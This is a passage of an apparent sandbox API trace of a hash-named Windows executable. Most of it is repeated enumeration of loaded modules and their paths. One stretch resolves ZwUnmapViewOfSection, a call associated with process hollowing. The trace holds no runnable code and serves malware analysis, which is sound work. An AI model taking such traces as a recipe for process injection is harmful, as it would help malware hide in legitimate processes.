lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\8cd2187094ba6cade0ca0fab4f932654\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\8cd2187094ba6cade0ca0fab4f932654\\system.windows.forms.ni.dll")) returned 0x80 [0167.652] CoTaskMemFree (pv=0x8b4c68) [0167.652] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.652] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c7b0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0167.654] CoTaskMemFree (pv=0x8b4c68) [0167.654] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.654] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c7b0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0167.655] CoTaskMemFree (pv=0x8b4c68) [0167.655] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.655] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f730000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0167.656] CoTaskMemFree (pv=0x8b4c68) [0167.656] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.656] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f730000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0167.657] CoTaskMemFree (pv=0x8b4c68) [0167.657] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.657] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c3f0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="System.Runtime.Remoting.ni.dll") returned 0x1e [0167.658] CoTaskMemFree (pv=0x8b4c68) [0167.658] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.658] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c3f0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\System.Runtime.Remoting.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\system.runtime.remoting.ni.dll")) returned 0x83 [0167.659] CoTaskMemFree (pv=0x8b4c68) [0167.662] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.662] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d300000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="amsi.dll") returned 0x8 [0167.663] CoTaskMemFree (pv=0x8b4c68) [0167.663] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.663] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d300000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll")) returned 0x1c [0167.664] CoTaskMemFree (pv=0x8b4c68) [0167.664] GetModuleInformation (in: hProcess=0x2e4, hModule=0x684d0000, lpmodinfo=0x2244e54, cb=0xc | out: lpmodinfo=0x2244e54*(lpBaseOfDll=0x684d0000, SizeOfImage=0x712000, EntryPoint=0x0)) returned 1 [0167.665] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.665] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x684d0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0167.666] CoTaskMemFree (pv=0x8b4c68) [0167.666] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.666] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x684d0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\abad45b9cc652ba7e38c4c837234c0ab\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\abad45b9cc652ba7e38c4c837234c0ab\\system.core.ni.dll")) returned 0x6e [0167.667] CoTaskMemFree (pv=0x8b4c68) [0167.667] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74920000, lpmodinfo=0x2247010, cb=0xc | out: lpmodinfo=0x2247010*(lpBaseOfDll=0x74920000, SizeOfImage=0x6000, EntryPoint=0x74921460)) returned 1 [0167.668] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.669] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74920000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0167.669] CoTaskMemFree (pv=0x8b4c68) [0167.670] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.670] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74920000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0167.671] CoTaskMemFree (pv=0x8b4c68) [0167.671] CloseHandle (hObject=0x2e4) returned 1 [0167.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ZwUnmapViewOfSection", cchWideChar=20, lpMultiByteStr=0x19cb6c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZwUnmapViewOfSectionMÚd", lpUsedDefaultChar=0x0) returned 20 [0167.671] GetProcAddress (hModule=0x77110000, lpProcName="ZwUnmapViewOfSection") returned 0x77186f40 [0167.683] GetCurrentProcessId () returned 0x1318 [0167.683] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1318) returned 0x2e4 [0167.683] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2249b68, cb=0x100, lpcbNeeded=0x19cb68 | out: lphModule=0x2249b68, lpcbNeeded=0x19cb68) returned 1 [0167.684] GetModuleInformation (in: hProcess=0x2e4, hModule=0x400000, lpmodinfo=0x2249ca8, cb=0xc | out: lpmodinfo=0x2249ca8*(lpBaseOfDll=0x400000, SizeOfImage=0x76000, EntryPoint=0x0)) returned 1 [0167.684] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.684] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x400000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe") returned 0x44 [0167.684] CoTaskMemFree (pv=0x8b4c68) [0167.684] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.684] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x400000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe")) returned 0x62 [0167.685] CoTaskMemFree (pv=0x8b4c68) [0167.685] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77110000, lpmodinfo=0x224becc, cb=0xc | out: lpmodinfo=0x224becc*(lpBaseOfDll=0x77110000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0167.685] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.685] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77110000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0167.685] CoTaskMemFree (pv=0x8b4c68) [0167.685] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.685] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77110000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0167.685] CoTaskMemFree (pv=0x8b4c68) [0167.686] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d320000, lpmodinfo=0x224dfd0, cb=0xc | out: lpmodinfo=0x224dfd0*(lpBaseOfDll=0x6d320000, SizeOfImage=0x59000, EntryPoint=0x6d330780)) returned 1 [0167.686] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.686] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d320000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0167.689] CoTaskMemFree (pv=0x8b4c68) [0167.689] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.689] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d320000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0167.690] CoTaskMemFree (pv=0x8b4c68) [0167.690] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74610000, lpmodinfo=0x22500dc, cb=0xc | out: lpmodinfo=0x22500dc*(lpBaseOfDll=0x74610000, SizeOfImage=0xe0000, EntryPoint=0x74623980)) returned 1 [0167.690] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.690] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74610000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0167.690] CoTaskMemFree (pv=0x8b4c68) [0167.690] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.690] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74610000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0167.691] CoTaskMemFree (pv=0x8b4c68) [0167.691] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75710000, lpmodinfo=0x22521f0, cb=0xc | out: lpmodinfo=0x22521f0*(lpBaseOfDll=0x75710000, SizeOfImage=0x17e000, EntryPoint=0x757c1b90)) returned 1 [0167.691] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.691] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75710000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0167.691] CoTaskMemFree (pv=0x8b4c68) [0167.691] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.691] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75710000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0167.692] CoTaskMemFree (pv=0x8b4c68) [0167.692] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73d90000, lpmodinfo=0x2254338, cb=0xc | out: lpmodinfo=0x2254338*(lpBaseOfDll=0x73d90000, SizeOfImage=0x92000, EntryPoint=0x73dd0380)) returned 1 [0167.692] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.692] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73d90000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0167.692] CoTaskMemFree (pv=0x8b4c68) [0167.692] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.692] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73d90000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0167.693] CoTaskMemFree (pv=0x8b4c68) [0167.693] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74380000, lpmodinfo=0x2256444, cb=0xc | out: lpmodinfo=0x2256444*(lpBaseOfDll=0x74380000, SizeOfImage=0x7b000, EntryPoint=0x7439e970)) returned 1 [0167.693] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.693] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74380000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0167.694] CoTaskMemFree (pv=0x8b4c68) [0167.694] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.694] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74380000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0167.694] CoTaskMemFree (pv=0x8b4c68) [0167.694] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75a40000, lpmodinfo=0x2258558, cb=0xc | out: lpmodinfo=0x2258558*(lpBaseOfDll=0x75a40000, SizeOfImage=0xbe000, EntryPoint=0x75a75630)) returned 1 [0167.694] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.694] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75a40000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0167.695] CoTaskMemFree (pv=0x8b4c68) [0167.695] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.695] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75a40000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0167.695] CoTaskMemFree (pv=0x8b4c68) [0167.695] GetModuleInformation (in: hProcess=0x2e4, hModule=0x758c0000, lpmodinfo=0x225a664, cb=0xc | out: lpmodinfo=0x225a664*(lpBaseOfDll=0x758c0000, SizeOfImage=0x44000, EntryPoint=0x758d9d80)) returned 1 [0167.696] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.696] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x758c0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0167.696] CoTaskMemFree (pv=0x8b4c68) [0167.696] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.696] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x758c0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0167.696] CoTaskMemFree (pv=0x8b4c68) [0167.697] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75970000, lpmodinfo=0x225c7bc, cb=0xc | out: lpmodinfo=0x225c7bc*(lpBaseOfDll=0x75970000, SizeOfImage=0xad000, EntryPoint=0x75984f00)) returned 1 [0167.697] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.697] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75970000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0167.697] CoTaskMemFree (pv=0x8b4c68) [0167.697] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.697] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75970000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0167.698] CoTaskMemFree (pv=0x8b4c68) [0167.698] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73e40000, lpmodinfo=0x225e8c8, cb=0xc | out: lpmodinfo=0x225e8c8*(lpBaseOfDll=0x73e40000, SizeOfImage=0x1e000, EntryPoint=0x73e4b640)) returned 1 [0167.698] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.698] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73e40000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0167.699] CoTaskMemFree (pv=0x8b4c68) [0167.699] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.699] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73e40000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0167.699] CoTaskMemFree (pv=0x8b4c68) [0167.699] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73e30000, lpmodinfo=0x22609d4, cb=0xc | out: lpmodinfo=0x22609d4*(lpBaseOfDll=0x73e30000, SizeOfImage=0xa000, EntryPoint=0x73e32a00)) returned 1 [0167.700] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.700] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73e30000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0167.700] CoTaskMemFree (pv=0x8b4c68) [0167.700] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.700] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73e30000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0167.701] CoTaskMemFree (pv=0x8b4c68) [0167.701] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77040000, lpmodinfo=0x2262ae8, cb=0xc | out: lpmodinfo=0x2262ae8*(lpBaseOfDll=0x77040000, SizeOfImage=0x58000, EntryPoint=0x770825c0)) returned 1 [0167.701] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.701] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77040000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0167.702] CoTaskMemFree (pv=0x8b4c68) [0167.702] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.702] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77040000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0167.702] CoTaskMemFree (pv=0x8b4c68) [0167.702] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c8d0000, lpmodinfo=0x2264c1c, cb=0xc | out: lpmodinfo=0x2264c1c*(lpBaseOfDll=0x6c8d0000, SizeOfImage=0x79000, EntryPoint=0x6c8df82a)) returned 1 [0167.703] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.703] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c8d0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0167.703] CoTaskMemFree (pv=0x8b4c68) [0167.703] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.703] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c8d0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0167.704] CoTaskMemFree (pv=0x8b4c68) [0167.704] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74a00000, lpmodinfo=0x2266d64, cb=0xc | out: lpmodinfo=0x2266d64*(lpBaseOfDll=0x74a00000, SizeOfImage=0x45000, EntryPoint=0x74a1de90)) returned 1 [0167.704] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.704] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74a00000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0167.705] CoTaskMemFree (pv=0x8b4c68) [0167.705] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.705] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74a00000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0167.705] CoTaskMemFree (pv=0x8b4c68) [0167.706] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74400000, lpmodinfo=0x2268e70, cb=0xc | out: lpmodinfo=0x2268e70*(lpBaseOfDll=0x74400000, SizeOfImage=0x1bd000, EntryPoint=0x744e2a10)) returned 1 [0167.706] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.706] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74400000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0167.707] CoTaskMemFree (pv=0x8b4c68) [0167.707] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.707] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74400000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0167.707] CoTaskMemFree (pv=0x8b4c68) [0167.707] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74a50000, lpmodinfo=0x226af7c, cb=0xc | out: lpmodinfo=0x226af7c*(lpBaseOfDll=0x74a50000, SizeOfImage=0x14f000, EntryPoint=0x74b06820)) returned 1 [0167.708] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.708] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74a50000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0167.708] CoTaskMemFree (pv=0x8b4c68) [0167.708] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.708] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74a50000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0167.709] CoTaskMemFree (pv=0x8b4c68) [0167.709] GetModuleInformation (in: hProcess=0x2e4, hModule=0x755c0000, lpmodinfo=0x226d10c, cb=0xc | out: lpmodinfo=0x226d10c*(lpBaseOfDll=0x755c0000, SizeOfImage=0x147000, EntryPoint=0x755d1cf0)) returned 1 [0167.709] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.709] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x755c0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0167.710] CoTaskMemFree (pv=0x8b4c68) [0167.710] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.710] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x755c0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0167.710] CoTaskMemFree (pv=0x8b4c68) [0167.710] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74990000, lpmodinfo=0x226f218, cb=0xc | out: lpmodinfo=0x226f218*(lpBaseOfDll=0x74990000, SizeOfImage=0x2b000, EntryPoint=0x74995680)) returned 1 [0167.711] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.711] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74990000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0167.712] CoTaskMemFree (pv=0x8b4c68) [0167.712] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.712] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74990000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0167.712] CoTaskMemFree (pv=0x8b4c68) [0167.712] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77030000, lpmodinfo=0x227131c, cb=0xc | out: lpmodinfo=0x227131c*(lpBaseOfDll=0x77030000, SizeOfImage=0xc000, EntryPoint=0x77033930)) returned 1 [0167.713] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.713] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77030000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0167.713] CoTaskMemFree (pv=0x8b4c68) [0167.713] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.713] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77030000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0167.717] CoTaskMemFree (pv=0x8b4c68) [0167.717] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d310000, lpmodinfo=0x2273448, cb=0xc | out: lpmodinfo=0x2273448*(lpBaseOfDll=0x6d310000, SizeOfImage=0x8000, EntryPoint=0x6d3117b0)) returned 1 [0167.718] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.718] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d310000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0167.718] CoTaskMemFree (pv=0x8b4c68) [0167.718] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.718] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d310000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0167.726] CoTaskMemFree (pv=0x8b4c68) [0167.726] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6b6f0000, lpmodinfo=0x2275554, cb=0xc | out: lpmodinfo=0x2275554*(lpBaseOfDll=0x6b6f0000, SizeOfImage=0x6b1000, EntryPoint=0x6b705d20)) returned 1 [0167.726] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.726] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6b6f0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0167.727] CoTaskMemFree (pv=0x8b4c68) [0167.727] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.727] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6b6f0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0167.728] CoTaskMemFree (pv=0x8b4c68) [0167.728] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c650000, lpmodinfo=0x2277684, cb=0xc | out: lpmodinfo=0x2277684*(lpBaseOfDll=0x6c650000, SizeOfImage=0xf5000, EntryPoint=0x6c6a4160)) returned 1 [0167.729] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.729] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c650000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0167.729] CoTaskMemFree (pv=0x8b4c68) [0167.729] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.729] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c650000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0167.730] CoTaskMemFree (pv=0x8b4c68) [0167.730] GetModuleInformation (in: hProcess=0x2e4, hModule=0x69850000, lpmodinfo=0x22797b8, cb=0xc | out: lpmodinfo=0x22797b8*(lpBaseOfDll=0x69850000, SizeOfImage=0x1228000, EntryPoint=0x0)) returned 1 [0167.731] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.731] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x69850000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0167.731] CoTaskMemFree (pv=0x8b4c68) [0167.732] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.732] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x69850000, lpFilename=0x8b4c68, nSize=0x800 | out: 